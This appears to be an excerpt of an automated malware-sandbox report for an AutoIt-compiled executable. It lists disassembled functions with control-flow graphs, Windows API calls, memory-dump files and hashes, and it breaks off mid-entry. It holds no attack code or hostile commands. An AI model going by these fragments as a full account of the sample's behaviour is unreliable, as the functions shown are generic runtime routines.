                                                                                                                                                                                                                                                                  control_flow_graph 744 cfac3e-cfb063 call ce8ec0 call cfbc58 call cee6a0 751 cfb069-cfb073 744->751 752 d38584-d38591 744->752 753 cfb079-cfb07e 751->753 754 d3896b-d38979 751->754 755 d38593 752->755 756 d38596-d385a5 752->756 761 d385b2-d385b4 753->761 762 cfb084-cfb090 call cfb5b6 753->762 759 d3897b 754->759 760 d3897e 754->760 755->756 757 d385a7 756->757 758 d385aa 756->758 757->758 758->761 759->760 763 d38985-d3898e 760->763 767 d385bd 761->767 762->767 769 cfb096-cfb0a3 call cec98d 762->769 765 d38993 763->765 766 d38990 763->766 771 d3899c-d389eb call cee6a0 call cfbbbe * 2 765->771 766->765 770 d385c7 767->770 775 cfb0ab-cfb0b4 769->775 776 d385cf-d385d2 770->776 803 d389f1-d38a03 call cfb5b6 771->803 804 cfb1e0-cfb1f5 771->804 778 cfb0b8-cfb0d6 call d04d98 775->778 779 cfb158-cfb16f 776->779 780 d385d8-d38600 call d04cd3 call ce7ad5 776->780 797 cfb0d8-cfb0e1 778->797 798 cfb0e5 778->798 785 d38954-d38957 779->785 786 cfb175 779->786 813 d38602-d38606 780->813 814 d3862d-d38651 call ce7b1a call cebd98 780->814 787 d38a41-d38a79 call cee6a0 call cfbbbe 785->787 788 d3895d-d38960 785->788 789 cfb17b-cfb17e 786->789 790 d388ff-d38920 call cee6a0 786->790 787->804 848 d38a7f-d38a91 call cfb5b6 787->848 788->771 794 d38962-d38965 788->794 795 d38729-d38743 call cfbbbe 789->795 796 cfb184-cfb187 789->796 790->804 818 d38926-d38938 call cfb5b6 790->818 794->754 794->804 835 d38749-d3874c 795->835 836 d3888f-d388b5 call cee6a0 795->836 805 cfb18d-cfb190 796->805 806 d386ca-d386e0 call ce6c03 796->806 797->778 807 cfb0e3 797->807 798->770 809 cfb0eb-cfb0fc 798->809 839 d38a05-d38a0d 803->839 840 d38a2f-d38a3c call cec98d 803->840 820 cfb1fb-cfb20b call cee6a0 804->820 821 d38ac9-d38acf 804->821 816 d38656-d38659 805->816 817 cfb196-cfb1b8 call cee6a0 805->817 806->804 851 d386e6-d386fc call cfb5b6 806->851 807->809 809->754 819 cfb102-cfb11c 809->819 813->814 826 d38608-d3862b call cead40 813->826 814->816 816->754 832 d3865f-d38674 call ce6c03 816->832 817->804 856 cfb1ba-cfb1cc call cfb5b6 817->856 859 d38945 818->859 860 d3893a-d38943 call cec98d 818->860 819->776 831 cfb122-cfb154 call cfbbbe call cee6a0 819->831 821->775 837 d38ad5 821->837 826->813 826->814 831->779 832->804 879 d3867a-d38690 call cfb5b6 832->879 846 d387bf-d387de call cee6a0 835->846 847 d3874e-d38751 835->847 836->804 882 d388bb-d388cd call cfb5b6 836->882 837->754 854 d38a0f-d38a13 839->854 855 d38a1e-d38a29 call ceb4b1 839->855 892 d38ac2-d38ac4 840->892 846->804 884 d387e4-d387f6 call cfb5b6 846->884 862 d38757-d38774 call cee6a0 847->862 863 d38ada-d38ae8 847->863 896 d38a93-d38a9b 848->896 897 d38ab5-d38abe call cec98d 848->897 885 d386fe-d3870b call ce8ec0 851->885 886 d3870d-d38716 call ce8ec0 851->886 854->855 872 d38a15-d38a19 854->872 855->840 903 d38b0b-d38b19 855->903 904 d386ba-d386c3 call cec98d 856->904 905 cfb1d2-cfb1de 856->905 878 d38949-d3894f 859->878 860->878 862->804 907 d3877a-d3878c call cfb5b6 862->907 870 d38aea 863->870 871 d38aed-d38afd 863->871 870->871 887 d38b02-d38b06 871->887 888 d38aff 871->888 889 d38aa1-d38aa3 872->889 878->804 917 d38692-d3869b call cec98d 879->917 918 d3869d-d386ab call ce8ec0 879->918 922 d388cf-d388dc call cec98d 882->922 923 d388de 882->923 884->804 925 d387fc-d38805 call cfb5b6 884->925 926 d38719-d38724 call ce8577 885->926 886->926 887->820 888->887 889->804 892->804 908 d38aa8-d38ab3 call ceb4b1 896->908 909 d38a9d 896->909 897->892 914 d38b1b 903->914 915 d38b1e-d38b21 903->915 904->806 905->804 938 d3879f 907->938 939 d3878e-d3879d call cec98d 907->939 908->897 908->903 909->889 914->915 915->763 946 d386ae-d386b5 917->946 918->946 933 d388e2-d388e9 922->933 923->933 952 d38807-d38816 call cec98d 925->952 953 d38818 925->953 926->804 941 d388f5 call ce3907 933->941 942 d388eb-d388f0 call ce396b 933->942 948 d387a3-d387ae call d09334 938->948 939->948 951 d388fa 941->951 942->804 946->804 948->754 962 d387b4-d387ba 948->962 951->804 957 d3881c-d3883f 952->957 953->957 960 d38841-d38848 957->960 961 d3884d-d38850 957->961 960->961 963 d38852-d3885b 961->963 964 d38860-d38863 961->964 962->804 963->964 965 d38873-d38876 964->965 966 d38865-d3886e 964->966 965->804 967 d3887c-d3888a 965->967 966->965 967->804
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                  • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                  • Opcode ID: 7f7f350d8f29126629c8dd69f27cadfefb505e2755d17a34361465d70043f6d4
                                                                                                                                                                                                                                                                  • Instruction ID: 088855973b832f88fe97bba2af40b2bd22fc90ce301e8f20bf6cc148677e0b26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f7f350d8f29126629c8dd69f27cadfefb505e2755d17a34361465d70043f6d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5625670508385CFC728DF25C085AAABBE1FF88304F14896EE5998B351DB70E945DFA2
                                                                                                                                                                                                                                                                  Function 00CE35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1004 ce35b3-ce3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CE35E1
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CE3602
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE3616
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE361F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                  • Opcode ID: 074c2303cc94e707ab476e2af79528adec4657c5814766f95d412f7ebbe03457
                                                                                                                                                                                                                                                                  • Instruction ID: efd9f48b8b41af087d11e247642b12572a203de9fff9d4f7a0c7f6352ac174ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 074c2303cc94e707ab476e2af79528adec4657c5814766f95d412f7ebbe03457
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF03A72600394FAE73107536C09E373EBEEBC6F10B04051EB908EB3A0D2691881DAB0
                                                                                                                                                                                                                                                                  Function 00CE61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D25287
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CE6299
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                  • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                  • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                  • Opcode ID: 4d01f42b701066c6d6301af790faf0ba2c2b9fde1e7407f77b186b9842ea7a9c
                                                                                                                                                                                                                                                                  • Instruction ID: b5b99db2e737476a9adde9bf11883e6e236cf312e019a92f44c9c053a96f343c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d01f42b701066c6d6301af790faf0ba2c2b9fde1e7407f77b186b9842ea7a9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941D672408344AFC311EB61EC45EEF77ECAF54360F004A1EF599821A1EF749A49D7A2
                                                                                                                                                                                                                                                                  Function 00CE58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1056 ce58cb-ce58d6 1057 ce5948-ce594a 1056->1057 1058 ce58d8-ce58dd 1056->1058 1060 ce593b-ce593e 1057->1060 1058->1057 1059 ce58df-ce58f7 RegOpenKeyExW 1058->1059 1059->1057 1061 ce58f9-ce5918 RegQueryValueExW 1059->1061 1062 ce592f-ce593a RegCloseKey 1061->1062 1063 ce591a-ce5925 1061->1063 1062->1060 1064 ce593f-ce5946 1063->1064 1065 ce5927-ce5929 1063->1065 1066 ce592d 1064->1066 1065->1066 1066->1062
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE58EF
                                                                                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE5910
                                                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE5932
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                  • Opcode ID: 654d7c091e5b8354c737547b0eaa284b12dab6a630e7f9085a5e3734159261f2
                                                                                                                                                                                                                                                                  • Instruction ID: a3cda75b45f1454f4fbb0fee1c9a77fe2a59f4367bed5648812c1b268919e9e4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 654d7c091e5b8354c737547b0eaa284b12dab6a630e7f9085a5e3734159261f2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A117C75510658FFDB218F66DC80DEE77B9EF01764F104419F805E7210E2319E429760
                                                                                                                                                                                                                                                                  Function 00CEF6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Variable must be of type 'Object'., xrefs: 00D348C6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                  • API String ID: 0-109567571
                                                                                                                                                                                                                                                                  • Opcode ID: f0fad0e8e55a01ee263ce5fb4a50fb8bf7530bccfa3bb737f93b311c24b89aa2
                                                                                                                                                                                                                                                                  • Instruction ID: eb7d5963610d88116e78a27d62fd591e0bc12dc26bcc443dc03e7ede80a4a00e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0fad0e8e55a01ee263ce5fb4a50fb8bf7530bccfa3bb737f93b311c24b89aa2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CC2AB71A00248DFCB20CF99C890BADB7F1FF09700F248169E955AB391D775AE42DBA1
                                                                                                                                                                                                                                                                  Function 00CF0340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CF15F2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                  • Opcode ID: decffb09308f54f9b726202fcbb4297fe9426f817f882c307b1517269f07af77
                                                                                                                                                                                                                                                                  • Instruction ID: f7c2229c6fbd792c7d192b7015220f58496b08e4252edbc95b47f54945b9ae2c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: decffb09308f54f9b726202fcbb4297fe9426f817f882c307b1517269f07af77
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B28B74A08344DFCBA4CF15C480A3AB7E1BB84700F24895DEA998B352D771EE45DBA3
                                                                                                                                                                                                                                                                  Function 00D0014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00D009D8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D03614: RaiseException.KERNEL32(?,?,?,00D009FA,?,00000000,?,?,?,?,?,?,00D009FA,00000000,00DA9758,00000000), ref: 00D03674
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00D009F5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                  • Opcode ID: f2bc8b14c83e44613c4476a3dba3dadd6b8683a87b3d0d5c257aca8b680de837
                                                                                                                                                                                                                                                                  • Instruction ID: f4895a4fe25fddf1cdb3e071830c8ec679b1b90aa286174c17d4334440ca0430
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2bc8b14c83e44613c4476a3dba3dadd6b8683a87b3d0d5c257aca8b680de837
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0A43490020CB6CB00BAA4E856B9E7B6C9E01350F584121B95CD75D2FB71E61A8AF1
                                                                                                                                                                                                                                                                  Function 00D689B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00D68D52
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00D68D59
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00D68F3A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 146820519-0
                                                                                                                                                                                                                                                                  • Opcode ID: facee0ade242b532cadec3c9e223e4caf58b41075f0bc6cc1e22738cdcf38fcd
                                                                                                                                                                                                                                                                  • Instruction ID: a503ab861d5ce2b485522c9574a0abaa70551be93a6973811a3b84eacb9b4cb2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: facee0ade242b532cadec3c9e223e4caf58b41075f0bc6cc1e22738cdcf38fcd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16125B71A083419FC714CF28C484B2ABBE5FF88314F18895DF8899B252DB71E945DBA2
                                                                                                                                                                                                                                                                  Function 00D69AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 306214811-0
                                                                                                                                                                                                                                                                  • Opcode ID: 51d078e9ce6fb433c12c4a02fd16bf8bbce8bd708438c97904be6beac85a4de4
                                                                                                                                                                                                                                                                  • Instruction ID: c953dae27e79ff8c928ba7ca4435deb8dc0cfbe525d012c6f0765340fab1f18f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51d078e9ce6fb433c12c4a02fd16bf8bbce8bd708438c97904be6beac85a4de4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7A15A31600645EFCB18DF18D5E19A9BBE5FF45314B2484ADE84A8F292DB31ED42CFA1
                                                                                                                                                                                                                                                                  Function 00CE2793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CE32AF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CE32B7
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CE32C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CE32CD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CE32D5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CE32DD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3205: RegisterWindowMessageW.USER32(00000004,?,00CE2964), ref: 00CE325D
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00CE2A0A
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32 ref: 00CE2A28
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00D23A0D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
